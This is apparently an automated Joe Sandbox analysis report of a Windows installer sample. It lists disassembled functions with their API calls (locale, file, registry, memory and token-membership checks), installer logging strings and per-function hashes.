Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76

Function 004026C4 Relevance: 1.5, APIs: 1, Instructions: 20timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 004026CE

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: SystemTime
String ID:
API String ID: 2656138-0
Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748

Function 00405CF4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E

Function 0040840C Relevance: .5, Instructions: 545COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55

Function 00407024 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1

Strings

.DEFAULT\Control Panel\International, xrefs: 00407078
Control Panel\Desktop\ResourceLocale, xrefs: 004070B0
kernel32.dll, xrefs: 00407048
Locale, xrefs: 00407090
GetUserDefaultUILanguage, xrefs: 00407043

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 4190037839-2401316094
Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E

Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
GetLastError.KERNEL32(000000F5), ref: 00403C1E

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D

Function 004019DC Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
LocalFree.KERNEL32(00743C10,00000000,00401AB4), ref: 00401A1B
VirtualFree.KERNEL32(?,00000000,00008000,00743C10,00000000,00401AB4), ref: 00401A3A
LocalFree.KERNEL32(00744C10,?,00000000,00008000,00743C10,00000000,00401AB4), ref: 00401A79
RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE

Strings

4Rt, xrefs: 00401A53
DRt, xrefs: 00401A27, 00401A41, 00401A49

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID: 4Rt$DRt
API String ID: 3782394904-192030282
Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D

Function 004053C4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE

Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A

Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B

Strings

mmmm d, yyyy, xrefs: 004054CF
m/d/yy, xrefs: 004054AD
AMPM, xrefs: 004055A9
:mm:ss, xrefs: 004055DA
:mm, xrefs: 004055C0

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InfoLocale$DefaultSystem
String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
API String ID: 1044490935-665933166
Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C

Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
ExitProcess.KERNEL32 ref: 00403DE5

Strings

9@, xrefs: 00403D29, 00403D34
Error, xrefs: 00403D91
Runtime error at 00000000, xrefs: 00403D96, 00403DA9

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ExitMessageProcess
String ID: Error$Runtime error at 00000000$9@
API String ID: 1220098344-1503883590
Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E

Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD

Function 00401494 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,4Rt,?,?,?,00401800), ref: 004014B2
VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,4Rt,?,?,?,00401800), ref: 004014D7
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,4Rt,?,?,?,00401800), ref: 004014FD

Strings

4Rt, xrefs: 00401497
DRt, xrefs: 004014E5

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Virtual$Alloc$Free
String ID: 4Rt$DRt
API String ID: 3668210933-192030282
Opcode ID: 53fb4fb4dead2bf9bf87b2a1222c08a4795459efffcdd9b971e00269c0061a0c
Instruction ID: d5dc587d839e3be782c9b7b9e1ff5a952950f17ebcccd457e3de013d7af40e21
Opcode Fuzzy Hash: 53fb4fb4dead2bf9bf87b2a1222c08a4795459efffcdd9b971e00269c0061a0c
Instruction Fuzzy Hash: 7CF0C8717403106AEB316E694CC5F533AD89F85754F1040BAFA0DFF3DAD6745800826C

Function 004030DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE

Strings

U1hd.@, xrefs: 00403103
@'s, xrefs: 004030F3

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CommandHandleLineModule
String ID: @'s$U1hd.@
API String ID: 2123368496-3023071883
Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD

Function 00406E10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC

Strings

)q@, xrefs: 00406F3F, 00406E98, 00406EA8, 00406F04, 00406F28, 00406F18, 00406EEF

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: QueryValue
String ID: )q@
API String ID: 3660427363-2284170586
Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99

Function 00409C88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD

Strings

The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
Setup, xrefs: 00409CAD

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Message
String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
API String ID: 2030045667-3271211647
Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068

Function 004094D8 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

Analysis Process: file.tmpPID: 6312, Parent PID: 6524COMMON

Execution Graph

Execution Coverage:	15.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	66

Executed Functions

Function 004708A0 Relevance: 78.0, APIs: 4, Strings: 40, Instructions: 962COMMON

Download Yara Rule

Strings

Skipping due to "onlyifdestfileexists" flag., xrefs: 004710F2
@, xrefs: 004709A8
Existing file is protected by Windows File Protection. Skipping., xrefs: 00470FE4
InUn, xrefs: 00471357
-- File entry --, xrefs: 004708F3
Dest file is protected by Windows File Protection., xrefs: 00470AE5
Version of existing file: %u.%u.%u.%u, xrefs: 00470D74
Time stamp of our file: (failed to read), xrefs: 00470B9F
Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470EAD
Existing file has a later time stamp. Skipping., xrefs: 00470FC7
Non-default bitness: 32-bit, xrefs: 00470AB3
Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470EC8
Time stamp of existing file: (failed to read), xrefs: 00470C2F
Installing the file., xrefs: 00471101
Incrementing shared file count (32-bit)., xrefs: 0047179D
Dest file exists., xrefs: 00470BB3
, xrefs: 00470DC7, 00470F98, 00471016
Same time stamp. Skipping., xrefs: 00470F4D
.tmp, xrefs: 004711AF
Version of our file: (none), xrefs: 00470CF4
Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470EBC
Incrementing shared file count (64-bit)., xrefs: 00471784
Existing file is a newer version. Skipping., xrefs: 00470DFA
Version of existing file: (none), xrefs: 00470EF2
Will register the file (a DLL/OCX) later., xrefs: 00471717
Time stamp of existing file: %s, xrefs: 00470C23
Same version. Skipping., xrefs: 00470EDD
Non-default bitness: 64-bit, xrefs: 00470AA7
Uninstaller requires administrator: %s, xrefs: 00471387
Skipping due to "onlyifdoesntexist" flag., xrefs: 00470BC6
User opted not to overwrite the existing file. Skipping., xrefs: 00471045
Dest filename: %s, xrefs: 00470A8C
Version of our file: %u.%u.%u.%u, xrefs: 00470CE8
Will register the file (a type library) later., xrefs: 0047170B
Time stamp of our file: %s, xrefs: 00470B93
Stripped read-only attribute., xrefs: 004710BF
Failed to strip read-only attribute., xrefs: 004710CB
Couldn't read time stamp. Skipping., xrefs: 00470F2D
User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0047108E
Installing into GAC, xrefs: 0047190C

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
API String ID: 0-4021121268
Opcode ID: 9f2865767024a930b7916cd63da71f425be50596fff11d1e8904fa8c666432a3
Instruction ID: 467263080efe338566352cc629e32221acf2e6aeb32e26e45aec936313cc1361
Opcode Fuzzy Hash: 9f2865767024a930b7916cd63da71f425be50596fff11d1e8904fa8c666432a3
Instruction Fuzzy Hash: AA927434A04288DFDB11DFA9C445BDDBBB4AF05304F1480ABE848BB392D7789E49DB59

Function 0042E0AC Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 178
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32(0049A788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0E6
GetVersion.KERNEL32(00000000,0042E290,?,0049A788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E103
GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E290,?,0049A788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E11C
GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E122
CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E290,?,0049A788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E137
FreeSid.ADVAPI32(00000000,0042E297,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E28A

Strings

CheckTokenMembership, xrefs: 0042E112
advapi32.dll, xrefs: 0042E117

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
String ID: CheckTokenMembership$advapi32.dll
API String ID: 2252812187-1888249752
